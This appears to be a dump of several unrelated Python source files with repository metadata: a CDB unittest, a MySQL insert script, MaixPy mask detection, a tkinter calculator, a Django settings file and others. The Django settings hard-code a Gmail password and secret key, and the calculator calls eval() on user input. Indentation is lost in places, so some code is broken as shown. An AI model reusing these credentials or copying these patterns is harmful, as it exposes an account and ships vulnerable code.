# test _pack_value and _unpack_value
expected = 'abcde'
result = pageIntFromName._unpack_value(pageIntFromName._pack_value(expected))
self.assertEqual(result, expected)
# test _pack_key and _unpack_key
expected = 1234
result = pageIntFromName._unpack_key(pageIntFromName._pack_key(expected))
self.assertEqual(result, expected)
pageIntFromName.clear()
pageIntFromName.update(testPages)
self.assertEqual(len(pageIntFromName), len(testPages))
for i in testPages:
expected = testPages[i]
result = pageIntFromName[i]
self.assertEqual(result, expected)
pageIntFromName.clear()
self.assertEqual(len(pageIntFromName), 0)
def test_intValue(self):
"""Test dictionary with integer values"""
testPages = { \
'A': 290,
'B': 3783,
'Genetics': 12266,
'Biochemistry': 3954,
'EBay': 130495,
'Cell nucleus': 6235,
'Deoxyribonuclease I': 5507057,
'DNA': 7955}
#writer = mediawikicdbwriter.MediaWikiCdbWriter()
#writer.writeCdbIdFromName(self.dir+"pageIdFromName.cdb", testPages)
pageIntValue = CdbDictIntValue(self.dir + "pageIntValue.cdb")
# test _pack_value and _unpack_value
expected = 1234
result = pageIntValue._unpack_value(pageIntValue._pack_value(expected))
self.assertEqual(result, expected)
# test _pack_key and _unpack_key
expected = 'abcde'
result = pageIntValue._unpack_key(pageIntValue._pack_key(expected))
self.assertEqual(result, expected)
pageIntValue.clear()
pageIntValue.update(testPages)
self.assertEqual(len(pageIntValue), len(testPages))
for i in testPages:
expected = testPages[i]
result = pageIntValue[i]
self.assertEqual(result, expected)
        return  # early return: the update/insert checks below are disabled work-in-progress
pageIntValue['D'] = 1234
testPages['D'] = 1234
self.assertEqual(len(pageIntValue), len(testPages))
for i in testPages:
expected = testPages[i]
result = pageIntValue[i]
self.assertEqual(result, expected)
testPages['E'] = 1235
testPages['F'] = 1236
pageIntValue.update({'E': 1235, 'F': 1236})
self.assertEqual(len(pageIntValue), len(testPages))
for i in testPages:
print "bb", i
expected = testPages[i]['id']
result = pageIntValue[i]
self.assertEqual(result, expected)
self.assertTrue(False)
if __name__ == "__main__":
unittest.main()
|
[
"martinbudden@Martin-Buddens-MacBook-Pro-128.local"
] |
martinbudden@Martin-Buddens-MacBook-Pro-128.local
|
a5f438eda07a505719c1d571ca497d0f6d686280
|
fa12db8422b4a39c8fa3044936d75eba2637c5c0
|
/db.py
|
1162edbd0b51a04fcc5589bb1ddfc2cc9881f2bf
|
[] |
no_license
|
ericmeme321/stock
|
ac648186ffdf13a1e644c86e58735af6a6c7f585
|
057f45f870ee1e5013c9d86aeb4933f09810874b
|
refs/heads/main
| 2023-07-29T00:08:39.451252
| 2021-09-16T14:14:24
| 2021-09-16T14:14:24
| 403,338,993
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,018
|
py
|
import mysql.connector
from mysql.connector import Error
def DBinsert(stock_data, stock_name):
try:
        # Connect to the MySQL/MariaDB database
        connection = mysql.connector.connect(
            host='localhost',     # host name
            database='stock',     # database name
            user='root',          # user name
            password='')          # password
if connection.is_connected():
            # Show the database server version
            # db_Info = connection.get_server_info()
            # print("Database version:", db_Info)
            # Show the database currently in use
            # cursor = connection.cursor()
            # cursor.execute("SELECT DATABASE();")
            # record = cursor.fetchone()
            # print("Current database:", record)
stock_name = "tw_" + stock_name
cursor = connection.cursor()
            # the original `if not stock_name in cursor:` never detected an existing
            # table (iterating a fresh cursor yields nothing), so let the database check
            cursor.execute("CREATE TABLE IF NOT EXISTS " + stock_name + " (uid INT(5) AUTO_INCREMENT PRIMARY KEY\
                ,date VARCHAR(10), open FLOAT(10), close FLOAT(10), high FLOAT(10), low FLOAT(10), vol INT(10)\
                , rate VARCHAR(10));")
sql = "INSERT INTO "+ stock_name +" (date, open, close, high, low, vol, rate) VALUES (%s, %s, %s, %s, %s, %s, %s);"
for i in range(len(stock_data)):
row = stock_data.loc[i]
new_data = (str(row['日期']), str(row['開盤價']), str(row['收盤價']),
str(row['最高價']), str(row['最低價']), str(row['成交量']), str(row['漲跌幅']))
cursor.execute(sql, new_data)
            # Commit so the rows are actually written to the database
            connection.commit()
            print("Rows inserted successfully")
    except Error as e:
        print("Database connection failed:", e)
    finally:
        if (connection.is_connected()):
            cursor.close()
            connection.close()
            print("Database connection closed")
return
|
[
"ericmeme321@gmail.com"
] |
ericmeme321@gmail.com
|
cb916fc056750611a6e62f2972d1bc514726e31f
|
9caf26afb3db3fab6e60a27db57e30e4b1decb58
|
/code/testmodel/多线程切换模型/thread-switch-model.py
|
6edcbaf3b8169b8533f759627d1a9734bf3486e1
|
[] |
no_license
|
xjy0508xjy/Maixpy
|
c584629805438fcf9906fdccfb568d3d4d072b92
|
c3efe97e9009d9f5d4f53ece1533c899d1a0e98a
|
refs/heads/master
| 2023-06-30T19:43:52.688414
| 2021-07-26T03:07:02
| 2021-07-26T03:07:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,556
|
py
|
import sensor,image,lcd,time
import KPU as kpu
import _thread
return_meg = ['check']
WARNING = {'check': 'checking', 'unmask': 'please wear a mask', 'masks': 'take off mask and waiting for FACE check'}
def setsenor():
lcd.init(freq=15000000)
sensor.reset()
sensor.set_pixformat(sensor.RGB565)
sensor.set_framesize(sensor.QVGA)
sensor.set_windowing((224, 224))
sensor.set_vflip(1)
sensor.run(1)
def loadmodel():
global return_meg
classes = ['unmask','masks']
status=0
task = kpu.load("/sd/mask2.kmodel")
anchor = (0.64, 0.67, 0.93, 0.97, 0.98, 1.06, 1.07, 1.17, 1.17, 1.3)
kpu.init_yolo2(task, 0.5, 0.3, 5, anchor)
while status==0:
img = sensor.snapshot()
code = kpu.run_yolo2(task, img)
status = 1 if code else 0
if code:
for i in code:
a=img.draw_rectangle(i.rect())
a = lcd.display(img)
for i in code:
lcd.draw_string(i.x(), i.y(), classes[i.classid()], lcd.RED, lcd.WHITE)
lcd.draw_string(i.x(), i.y()+12, '%.3f'%i.value(), lcd.RED, lcd.WHITE)
return_meg=[classes[i.classid()],'%.3f'%i.value()]
else:
lcd.display(img)
            lcd.draw_string(50, 10, 'checking', lcd.RED, lcd.WHITE)
kpu.deinit(task)
def facemodel():
global return_meg
classes = ['people','nopeople']
status=0
task = kpu.load("/sd/face.kmodel")
anchors = (1.889, 2.5245, 2.9465, 3.94056, 3.99987, 5.3658, 5.155437, 6.92275, 6.718375, 9.01025)
kpu.init_yolo2(task, 0.5, 0.3, 5, anchors)
sensor.set_framesize(sensor.QVGA)
while True:
img = sensor.snapshot()
objects = kpu.run_yolo2(task, img)
status = 1 if objects else 0
if objects:
for i in objects:
a=img.draw_rectangle(i.rect())
a = lcd.display(img)
for i in objects:
lcd.draw_string(i.x(), i.y(), classes[i.classid()], lcd.RED, lcd.WHITE)
else:
lcd.display(img)
            lcd.draw_string(50, 10, 'take off mask and waiting for FACE check', lcd.RED, lcd.WHITE)
kpu.deinit(task)
if __name__ == "__main__":
_thread.start_new_thread(setsenor(),(0,))
_thread.start_new_thread(loadmodel(),(1,))
while True:
img = sensor.snapshot()
lcd.display(img)
lcd.draw_string(50,10, WARNING[return_meg[0]], lcd.RED,lcd.WHITE)
if return_meg[0] =='masks':
_thread.start_new_thread(facemodel(),(1,))
return_meg[0]='unmask'
|
[
"841891647@qq.com"
] |
841891647@qq.com
|
9ad3082f6beb7fe141b33b6a3a2165ebd2c6109d
|
14aad7b56c019f126d5d6d0581603d8e8ae8ae72
|
/god.works-v0.01.py
|
c8d3e2eb9a328bfab73919ba0124f8442f7e50f5
|
[] |
no_license
|
zombieleet/Open_Verse
|
6d1c9325ca52e458a699e8ddff03c519559ea32b
|
363031ac8ca7cf41fd394cd6c07ad0ed514aaeca
|
refs/heads/master
| 2020-12-24T10:33:09.520660
| 2015-08-05T17:32:03
| 2015-08-05T17:32:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,003
|
py
|
import tkinter as tk
calc = tk.Tk()
calc.title("God.Works")
FRONT_PAGE = ['OT','NT']
buttons = [
'OT', 'NT']
"""
, '9', '*', 'C',
'4', '5', '6', '/', 'Neg',
'1', '2', '3', '-', '$',
'0', '.', '=', '+', '@' ]
"""
# set up GUI
row = 1
col = 0
for i in buttons:
button_style = 'raised'
action = lambda x = i: click_event(x)
tk.Button(calc, text = i, width = 17, height = 17, relief = button_style, command = action) \
.grid(row = row, column = col, sticky = 'nesw')
col += 1
if col > 0: # if col > 4
col = 0
row += 1
display = tk.Entry(calc, width = 40, bg = "white")
display.grid(row = 0, column = 0, columnspan = 1) # columnspan = 5
def click_event(key):
# = -> calculate results
if key == '=':
# safeguard against integer division
if '/' in display.get() and '.' not in display.get():
display.insert(tk.END, ".0")
# attempt to evaluate results
try:
result = eval(display.get())
display.insert(tk.END, " = " + str(result))
        except Exception:
display.insert(tk.END, " Error, use only valid chars")
# C -> clear display
elif key == 'C':
display.delete(0, tk.END)
# $ -> clear display
elif key == '$':
display.delete(0, tk.END)
display.insert(tk.END, "$$$$C.$R.$E.$A.$M.$$$$")
# @ -> clear display
elif key == '@':
display.delete(0, tk.END)
display.insert(tk.END, "wwwwwwwwwwwwwwwwebsite")
# neg -> negate term
elif key == 'neg':
if '=' in display.get():
display.delete(0, tk.END)
try:
if display.get()[0] == '-':
display.delete(0)
else:
display.insert(0, '-')
except IndexError:
pass
# clear display and start new input
else:
if '=' in display.get():
display.delete(0, tk.END)
display.insert(tk.END, key)
# RUNTIME
calc.mainloop()
|
[
"kjphillips@suffolk.edu"
] |
kjphillips@suffolk.edu
|
3e1402dff571bf38b0da4764ff96cf356c407fcd
|
d1c86538a646bbf6b2d22a77b6de1325d13ae90f
|
/utils/temporal.py
|
cfe6d6ba385919241acfd9b85bb8f7998448c46b
|
[] |
no_license
|
xuecheng27/WWW21-Structural-Information
|
48904d0df34d9fcb069e709290d1e33c5fc76614
|
342d5880e522158b48219fe21a403abf5e8954e6
|
refs/heads/main
| 2023-02-20T21:33:13.123467
| 2021-01-23T11:00:46
| 2021-01-23T11:00:46
| 332,164,339
| 1
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,127
|
py
|
import pandas as pd
import numpy as np
def edgelist2snapshots(filepath, g):
"""Convert a edgelist with timestamps into g snapshots.
Arguments:
filepath (str): the filepath of the edgelist
g (int): the number of graph snapshots
"""
    df = pd.read_csv(filepath, sep=r'\s+', header=None, names=['from', 'to', 'weight', 'timestamp'], dtype={'from':'str', 'to':'str', 'weight':np.float64, 'timestamp':int})
ecount = len(df.index)
start_time = df['timestamp'].min()
end_time = df['timestamp'].max()
interval = (end_time - start_time) / g
snapshots = dict()
for i in range(g):
snapshots[i] = []
dfs = df.sort_values(by=['timestamp'])
for i in range(ecount):
idx = np.floor((dfs.iloc[i]['timestamp'] - start_time) / interval)
if int(idx) == g:
snapshots[g - 1].append(i)
else:
snapshots[int(idx)].append(i)
filename = filepath.split('/')[1].split('.')[0]
for i in range(g):
dfs.iloc[snapshots[i]].to_csv(f'datasets/temporal-{filename}/{filename}-{i}.txt', sep=' ', header=False, index=False)
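The floor-and-clamp loop above assigns each edge to one of `g` equal-width time bins; pandas can do the same binning vectorized. A minimal alternative sketch under the same `df` layout (the function name is illustrative, not part of the original module):

```python
import pandas as pd

def timestamp_bins(df: pd.DataFrame, g: int) -> pd.Series:
    # pd.cut splits [min, max] into g equal-width bins and returns the
    # integer bin index (0..g-1) per row, matching the manual floor/clamp.
    return pd.cut(df['timestamp'], bins=g, labels=False, include_lowest=True)

# usage: one sub-frame per snapshot
# for i, snap in df.groupby(timestamp_bins(df, g)): ...
```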
|
[
"51237370+xuecheng27@users.noreply.github.com"
] |
51237370+xuecheng27@users.noreply.github.com
|
f25b3a1838705336ae470c5e888b6d6e3172dd4a
|
f4244b1be1af8caa3d8848d679a2aa6d0b8fce2d
|
/NumberFun/ifPalindrome.py
|
408e0cf0cc6e727aad8829ad0a6620d5b71c540a
|
[] |
no_license
|
Sappadilla/NumberFun
|
ea4de65f80f7c6d70e6e659429b93f1db4e3f9f0
|
70010e97c7f9a86e83cc5e7f87e272c40cd3d8e9
|
refs/heads/master
| 2021-05-14T03:36:40.539911
| 2018-01-08T03:01:04
| 2018-01-08T03:01:04
| 116,621,979
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 551
|
py
|
#given input word, determine if it's a palindrome
def ifPalindrome(word):
    if len(word) <= 1: return True  # empty and single-character strings are palindromes
    return word[0] == word[-1] and ifPalindrome(word[1:-1])
def main():
#print(ifPalindrome("racecar"))
#print(ifPalindrome("tacocat"))
#print(ifPalindrome("taccccat"))
possible = ""
while possible != "exit":
possible = input("Put a word in to see if it's a Palindrome!\n")
print(ifPalindrome(possible))
if __name__ == "__main__":
main()
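Each recursive call above copies a slice, so the recursion does O(n^2) character work in the worst case; comparing against the reversed string is O(n). An equivalent one-liner, shown as an illustrative alternative:

```python
def is_palindrome_slice(word: str) -> bool:
    # compare the word with its reverse; one pass, one extra copy
    return word == word[::-1]

assert is_palindrome_slice("racecar") and not is_palindrome_slice("taco")
```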
|
[
"noreply@github.com"
] |
Sappadilla.noreply@github.com
|
57ccbe6a175d71c2d9c38ec16fbf63bc2a87951d
|
143186a58fa0d0395823eb2be7861155f147ced2
|
/Python_Interview_Questions/leetcode/tests/Q88_merge_sorted_array_test.py
|
2398d6b2374d832edc9402cc1f2e9527140e2ef9
|
[] |
no_license
|
MLgeek96/Interview-Preparation-Kit
|
04dbda8259d5faaa1298f11c741de32744912fc7
|
39bfa35f74455df07b93b6d4e2378a6f2e556528
|
refs/heads/master
| 2023-08-14T19:12:39.913505
| 2023-07-25T13:55:32
| 2023-07-25T13:55:32
| 260,638,941
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 434
|
py
|
import pytest
from leetcode.problem_sets.Q88_merge_sorted_array import merge
print(merge.__doc__)
def test_merge():
nums1 = [1,2,3,0,0,0]
m = 3
nums2 = [2,5,6]
n = 3
assert merge(nums1, m, nums2, n) == [1,2,2,3,5,6]
nums1 = [1]
m = 1
nums2 = []
n = 0
assert merge(nums1, m, nums2, n) == [1]
nums1 = [0]
m = 0
nums2 = [1]
n = 1
assert merge(nums1, m, nums2, n) == [1]
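The `merge` under test is imported from the repo and not shown here; these assertions imply it returns the merged `nums1`. For context, the canonical LeetCode 88 approach fills `nums1` from the back with two pointers. A sketch under that assumption (the repo's real implementation may differ):

```python
def merge(nums1, m, nums2, n):
    # walk both arrays from the end so no unread nums1 element is overwritten
    i, j, k = m - 1, n - 1, m + n - 1
    while j >= 0:
        if i >= 0 and nums1[i] > nums2[j]:
            nums1[k] = nums1[i]
            i -= 1
        else:
            nums1[k] = nums2[j]
            j -= 1
        k -= 1
    return nums1  # returned so the equality assertions above hold
```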
|
[
"jacson.chong@bigpayme.com"
] |
jacson.chong@bigpayme.com
|
c091495cb1882df88af2fa73b44c05f99998e8ca
|
1d2648f6d3ae227803c82fa4b7d505903a3f4daa
|
/uediadd/settings.py
|
e449ac620786e21751e20fff3652542e2aadb1fb
|
[] |
no_license
|
devcoder007/Uediadd
|
dc55977c7de2475ca786074657091739f88e4728
|
02e66faf4e27fa8b3b3b4acebe13eab4f1bd10ea
|
refs/heads/master
| 2022-06-03T03:07:10.550506
| 2020-01-22T21:49:45
| 2020-01-22T21:49:45
| 234,139,165
| 0
| 0
| null | 2022-05-25T03:01:57
| 2020-01-15T17:51:29
|
Python
|
UTF-8
|
Python
| false
| false
| 4,630
|
py
|
"""
Django settings for uediadd project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATE_DIR = os.path.join(BASE_DIR,'template')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '_e5di5fy-)10)8*2rrrqai6$ox#fu5cw+os4kjg2g3g7+#(&kr'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ["*"]
# SESSION_COOKIE_SECURE = True
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'corsheaders',
'users',
'api',
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'django.contrib.sites',
'allauth',
'allauth.account',
'rest_auth.registration',
]
# ACCOUNT_AUTHENTICATION_METHOD = 'email'
# ACCOUNT_EMAIL_REQUIRED = True
# ACCOUNT_USERNAME_REQUIRED = False
# AUTHENTICATION_BACKENDS = (
# # Needed to login by username in Django admin, regardless of `allauth`
# "django.contrib.auth.backends.ModelBackend",
# # `allauth` specific authentication methods, such as login by e-mail
# "allauth.account.auth_backends.AuthenticationBackend",
# # "users.CustomObtainAuthToken",
# )
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = 'kampuskonnect.kk@gmail.com'
DEFAULT_FROM_EMAIL = 'kampuskonnect.kk@gmail.com'
EMAIL_HOST_PASSWORD = 'Rish@1996'
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# REST_FRAMEWORK = {
# 'DEFAULT_AUTHENTICATION_CLASSES': (
# 'rest_framework.authentication.TokenAuthentication',
# ),
# 'DEFAULT_PERMISSION_CLASSES': (
# 'rest_framework.permissions.IsAuthenticated', )
# }
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
SITE_ID = 1
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    # CorsMiddleware must sit above CommonMiddleware (per django-cors-headers docs);
    # the original listed it last and duplicated CommonMiddleware
    'corsheaders.middleware.CorsMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
CORS_ORIGIN_WHITELIST = [
"https://example.com",
"https://sub.example.com",
"http://localhost:8080",
"http://127.0.0.1:9000",
"http://localhost:4200",
]
ROOT_URLCONF = 'uediadd.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR,],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'uediadd.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
|
[
"rish@MacBook.local"
] |
rish@MacBook.local
|
ecdba4bb32ab0849dc1dc67fd70d841293255b5d
|
4348a28b5c8357c751bb81dfe5c2035cc72fbd6b
|
/Partido.py
|
ddd1c0c1f13af9c5c2541c1c17f0046262d37e71
|
[] |
no_license
|
Losajhonny/webscraping
|
9a91bb525c2f48c8cba76a40d0d2b835a1488d4f
|
7134fb39aa1d74786cd03d54c12d8c16984de0cc
|
refs/heads/master
| 2023-01-06T19:50:35.675755
| 2020-11-05T23:24:40
| 2020-11-05T23:24:40
| 298,959,150
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,435
|
py
|
class Partido:
yearIni = ''
yearFin = ''
jornadaNombre = ''
jornadaNumero = ''
fecha = ''
local_ta = ''
local_tr = ''
local_gl = ''
local = ''
visit_ta = ''
visit_tr = ''
visit_gl = ''
visit = ''
def toString(self):
return self.yearIni + ', ' + self.local + ' ' + self.local_gl + ' vs ' + self.visit_gl + ' ' + self.visit
def toStringLocal(self):
fechaFormat = self.fecha.split("/")
fechaString = fechaFormat[2] + "-" + fechaFormat[1] + "-" + fechaFormat[0]
cad = '"temporada": ' + self.yearIni + ', '
cad += '"yearIni": ' + self.yearIni + ', '
cad += '"yearFin": ' + self.yearFin + ', '
cad += '"nombreJornada": "' + self.jornadaNombre + '", '
cad += '"numeroJornada": ' + self.jornadaNumero + ', '
cad += '"fecha": (new Date("' + fechaString + '")).toISOString(), '
cad += '"juegoDe": "local", '
cad += '"equipo1": "' + self.local + '", '
cad += '"ta": ' + str(self.local_ta) + ', '
cad += '"tr": ' + str(self.local_tr) + ', '
cad += '"gf": ' + str(self.local_gl) + ', '
cad += '"equipo2": "' + self.visit + '", '
cad += '"gc": ' + str(self.visit_gl)
return cad
def toStringVisit(self):
fechaFormat = self.fecha.split("/")
fechaString = fechaFormat[2] + "-" + fechaFormat[1] + "-" + fechaFormat[0]
cad = '"temporada": ' + self.yearIni + ', '
cad += '"yearIni": ' + self.yearIni + ', '
cad += '"yearFin": ' + self.yearFin + ', '
cad += '"nombreJornada": "' + self.jornadaNombre + '", '
cad += '"numeroJornada": ' + self.jornadaNumero + ', '
cad += '"fecha": (new Date("' + fechaString + '")).toISOString(), '
cad += '"juegoDe": "visita", '
cad += '"equipo1": "' + self.visit + '", '
cad += '"ta": ' + str(self.visit_ta) + ', '
cad += '"tr": ' + str(self.visit_tr) + ', '
cad += '"gf": ' + str(self.visit_gl) + ', '
cad += '"equipo2": "' + self.local + '", '
cad += '"gc": ' + str(self.local_gl)
return cad
def toStringAll(self):
cad1 = self.toStringLocal()
cad2 = self.toStringVisit()
cad = 'db.partido.insert({ ' + cad1 + ' });\n'
cad += 'db.partido.insert({ ' + cad2 + ' });\n'
return cad
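Illustrative usage of the class above; every field value here is invented for the example. Note the fields are class attributes, so assigning on an instance shadows the shared defaults:

```python
p = Partido()
p.yearIni, p.yearFin = '2019', '2020'
p.jornadaNombre, p.jornadaNumero = 'Apertura', '1'
p.fecha = '05/11/2020'                     # dd/mm/yyyy, as toStringLocal expects
p.local, p.local_gl, p.local_ta, p.local_tr = 'Municipal', '2', '1', '0'
p.visit, p.visit_gl, p.visit_ta, p.visit_tr = 'Comunicaciones', '1', '3', '1'
print(p.toStringAll())  # emits two db.partido.insert({...}) statements, one per team
```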
|
[
"2564550230101@ingenieria.usac.edu.gt"
] |
2564550230101@ingenieria.usac.edu.gt
|
2546bdab1e9803a59b26742dbc22ff1ef7476613
|
ad4244cbe9943027b794f0f4d974b1702413b0fd
|
/ShortSaleRatio_Windows.py
|
333cff60cb9eceefa2d46009041a40dadc8a5629
|
[] |
no_license
|
kkutsutani/ShortSaleRatio_Windows
|
9d32fdaf8f9fde0255b16b29cdcc9c040cfbb4bc
|
693a833221ab96e755cd9698dec41adfd0ae1cb6
|
refs/heads/main
| 2023-03-04T19:27:11.488833
| 2021-02-12T07:53:35
| 2021-02-12T07:53:35
| 338,244,838
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,064
|
py
|
import os
import xlrd
import pprint
flist = os.listdir(path='xls')                   # list of every file name (without path) in the xls directory
print( len(flist) )                              # print the size of the list
xlslist = []                                     # define the list
meigara = 9432                                   # ★ security (ticker) code
# build the list of files with the .xls extension
for fname in flist:                              # loop over every file in the current path
    if fname.endswith('.xls'):                   # true when the file name ends in 'xls'
        xlslist.append( fname )                  # add the xls file name to the list
# process every file in the .xls list
for fname in xlslist:                            # loop over every xls file in the current path
    tmp_list = []
    wb = xlrd.open_workbook( "xls/" + fname )    # get the Book object for the xls file
    tmp_list.append( wb.sheet_names()[0] )       # add the sheet name to the list (public API instead of wb._sheet_names)
    sheet = wb.sheet_by_name( wb.sheet_names()[0] )  # get the named sheet
    lineno = 8
    hit = 0
    value = 0
    while lineno < sheet.nrows:                  # up to the last row
        cell = sheet.cell( lineno, 2 )           # read the cell
        if cell.ctype == 0:                      # if the cell is blank
            break                                # leave the loop
        if cell.value == meigara:                # does the cell match the security code?
            hit = 1                              # flag that the security was found
            cell = sheet.cell( lineno, 10 )      # read the cell
            value += cell.value                  # accumulate the "short-sale balance ratio"
        lineno += 1                              # next row
    if hit == 1:                                 # if the security was found
        tmp_list.append( value * 100 )           # add the ratio (as a percentage) to the list
        print( tmp_list )                        # output the short-sale balance ratio
|
[
"kkutsutani@oregano.ocn.ne.jp"
] |
kkutsutani@oregano.ocn.ne.jp
|
c1690f414026618d969eb3f83caaa9bcaa303ccc
|
c80bf22827ecf6cab725170f20a6cfe2d19e2d20
|
/exp3_DQN/maze_env.py
|
018a0f52e8df414e8ebfa7a03b87ad55acdf5888
|
[] |
no_license
|
Drawlone/RL
|
5753c9278c0df28e767c84a19bcdab9ebd56ea2a
|
06dd8494c54516a7edd72c711251637814e447d0
|
refs/heads/master
| 2022-07-03T00:40:16.349117
| 2020-05-19T04:49:58
| 2020-05-19T04:49:58
| 265,155,747
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,082
|
py
|
"""
Reinforcement learning maze example.
Red rectangle: explorer.
Black rectangles: hells [reward = -1].
Yellow bin circle: paradise [reward = +1].
All other states: ground [reward = 0].
This script is the environment part of this example.
The RL is in RL_brain.py.
View more on my tutorial page: https://morvanzhou.github.io/tutorials/
"""
import numpy as np
import time
import tkinter as tk
UNIT = 40 # pixels
MAZE_H = 4 # grid height
MAZE_W = 4 # grid width
class Maze(tk.Tk, object):
def __init__(self):
super(Maze, self).__init__()
self.action_space = ['u', 'd', 'l', 'r']
self.n_actions = len(self.action_space)
self.n_features = 2
self.title('maze')
self.geometry('{0}x{1}'.format(MAZE_H * UNIT, MAZE_H * UNIT))
self._build_maze()
def _build_maze(self):
self.canvas = tk.Canvas(self, bg='white',
height=MAZE_H * UNIT,
width=MAZE_W * UNIT)
# create grids
for c in range(0, MAZE_W * UNIT, UNIT):
x0, y0, x1, y1 = c, 0, c, MAZE_H * UNIT
self.canvas.create_line(x0, y0, x1, y1)
for r in range(0, MAZE_H * UNIT, UNIT):
x0, y0, x1, y1 = 0, r, MAZE_W * UNIT, r
self.canvas.create_line(x0, y0, x1, y1)
# create origin
origin = np.array([20, 20])
# hell
hell1_center = origin + np.array([UNIT * 2, UNIT])
self.hell1 = self.canvas.create_rectangle(
hell1_center[0] - 15, hell1_center[1] - 15,
hell1_center[0] + 15, hell1_center[1] + 15,
fill='black')
# hell
# hell2_center = origin + np.array([UNIT, UNIT * 2])
# self.hell2 = self.canvas.create_rectangle(
# hell2_center[0] - 15, hell2_center[1] - 15,
# hell2_center[0] + 15, hell2_center[1] + 15,
# fill='black')
# create oval
oval_center = origin + UNIT * 2
self.oval = self.canvas.create_oval(
oval_center[0] - 15, oval_center[1] - 15,
oval_center[0] + 15, oval_center[1] + 15,
fill='yellow')
# create red rect
self.rect = self.canvas.create_rectangle(
origin[0] - 15, origin[1] - 15,
origin[0] + 15, origin[1] + 15,
fill='red')
# pack all
self.canvas.pack()
def reset(self):
self.update()
time.sleep(0.1)
self.canvas.delete(self.rect)
origin = np.array([20, 20])
self.rect = self.canvas.create_rectangle(
origin[0] - 15, origin[1] - 15,
origin[0] + 15, origin[1] + 15,
fill='red')
# return observation
return (np.array(self.canvas.coords(self.rect)[:2]) - np.array(self.canvas.coords(self.oval)[:2]))/(MAZE_H*UNIT)
def step(self, action):
s = self.canvas.coords(self.rect)
base_action = np.array([0, 0])
if action == 0: # up
if s[1] > UNIT:
base_action[1] -= UNIT
elif action == 1: # down
if s[1] < (MAZE_H - 1) * UNIT:
base_action[1] += UNIT
elif action == 2: # right
if s[0] < (MAZE_W - 1) * UNIT:
base_action[0] += UNIT
elif action == 3: # left
if s[0] > UNIT:
base_action[0] -= UNIT
self.canvas.move(self.rect, base_action[0], base_action[1]) # move agent
next_coords = self.canvas.coords(self.rect) # next state
# reward function
if next_coords == self.canvas.coords(self.oval):
reward = 1
done = True
elif next_coords in [self.canvas.coords(self.hell1)]:
reward = -1
done = True
else:
reward = 0
done = False
s_ = (np.array(next_coords[:2]) - np.array(self.canvas.coords(self.oval)[:2]))/(MAZE_H*UNIT)
return s_, reward, done
def render(self):
# time.sleep(0.01)
self.update()
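The class exposes a Gym-style reset/step/render triple. A minimal random-agent rollout, sketched here as illustrative usage and not part of the original file (`render` pumps Tk events via `update`, so no explicit `mainloop` is needed):

```python
import random

if __name__ == '__main__':
    env = Maze()
    s = env.reset()
    done = False
    while not done:
        env.render()                     # refresh the Tk canvas
        a = random.randrange(env.n_actions)
        s, reward, done = env.step(a)    # step returns (state, reward, done)
    print('episode finished with reward', reward)
```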
|
[
"1419076398@qq.com"
] |
1419076398@qq.com
|
d6b7953295e0c4a5bb26ea5f6f41ed972a6a132b
|
7b475586d089f7da385bf125c2e3eb135e04edb7
|
/petfactory/modelling/curves/get_positions_on_circle_perimeter.py
|
9938c10361390a70adcd4cbf5d4eb09a2e4f0923
|
[] |
no_license
|
EriLee/petfactory_maya_scripts
|
e3085654f36fcb56b95601b4f801da9d4d990a8a
|
ba002212d61c94e87579fdbc5968282713b895b6
|
refs/heads/master
